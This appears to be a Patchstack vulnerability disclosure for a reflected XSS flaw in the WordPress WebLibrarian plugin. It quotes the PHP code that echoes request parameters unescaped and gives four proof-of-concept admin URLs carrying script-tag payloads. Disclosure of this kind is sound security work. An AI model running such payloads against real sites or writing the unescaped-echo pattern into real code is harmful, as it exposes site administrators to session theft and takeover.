WordPress WebLibrarian Plugin <= 3.5.8.1 is vulnerable to Cross Site Scripting (XSS)
Claim ownership and start a managed Vulnerability Disclosure Program.
Apply for mVDP
Vulnerability description
LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WebLibrarian Plugin to Patchstack.
See tips for patching this kind of vulnerabilityHow to reproduce
RXSS vulnerability occurs from line 643 to line 653 in display_bulk_upload_form() of the weblibrarian/includes/WEBLIB_Patrons_Admin.php file.
function display_bulk_upload_form($returnURL) {
if ( isset($_REQUEST['paged']) ) {
?><input type="hidden" name="paged" value="<?php echo $_REQUEST['paged'] ?>" /><?php
}
if ( isset($_REQUEST['screen-options-apply']) ) {
?><input type="hidden" name="screen-options-apply" value="<?php echo $_REQUEST['screen-options-apply'] ?>" /><?php
}
if ( isset($_REQUEST['wp_screen_options']['option']) ) {
?><input type="hidden" name="wp_screen_options[option]" value="<?php echo $_REQUEST['wp_screen_options']['option'] ?>" /><?php
}
if ( isset($_REQUEST['wp_screen_options']['value']) ) {
?><input type="hidden" name="wp_screen_options[value]" value="<?php echo $_REQUEST['wp_screen_options']['value'] ?>" /><?php
}
Additional information by researcher
paged, screen-options-apply, wp_screen_options, option, wp_screen_options, value
Additional comment by Patchstack
Additional vulnerable endpoint :
[+] PoC 01 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E
[+] PoC 02 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection-bulk&paged=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&screen-options-apply=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&wp_screen_options%5Boption%5D=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3Ewp_screen_options%5Bvalue%5D%3D%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E
[+] PoC 3:
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-collection&barcode=123&title=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&itemauthor=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&subject=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&description=1&itemcategory=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&media=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&publisher=%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&publocation=%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&pubdate=Jan%2F1%2F2023&edition=%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&isbn=1&type=1&thumburl=1&callnumber=%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&keywordlist&newkeyword&additem=Add+New+Item
[+] PoC 4 :
http://localhost:8888/wp-admin/admin.php?page=weblib-add-item-type&typename="><script>alert(1)</script>&loanperiod=14&addtype=Add+New+Type
See researcher files below
How to disclose
To make the patching process easier and safer for all users, we recommend reading our memo about the most common vulnerabilities and the way these can be fixed. If you need help understanding some of the security concepts, don’t worry. That’s when we step in and help.
Please send us the patched version or code before releasing it, so we could help you avoid incomplete patches that could lead to inconveniences. Don’t delay security patch releases for other non-security updates. Ideally, security fixes would be released separately so users could update ASAP without fear of anything breaking. You can also join the free Patchstack mVDP program to have better control over the vulnerability patching and disclosure process.
LEE SE HYOUNG (hackintoanetwork)
Provide link to fix
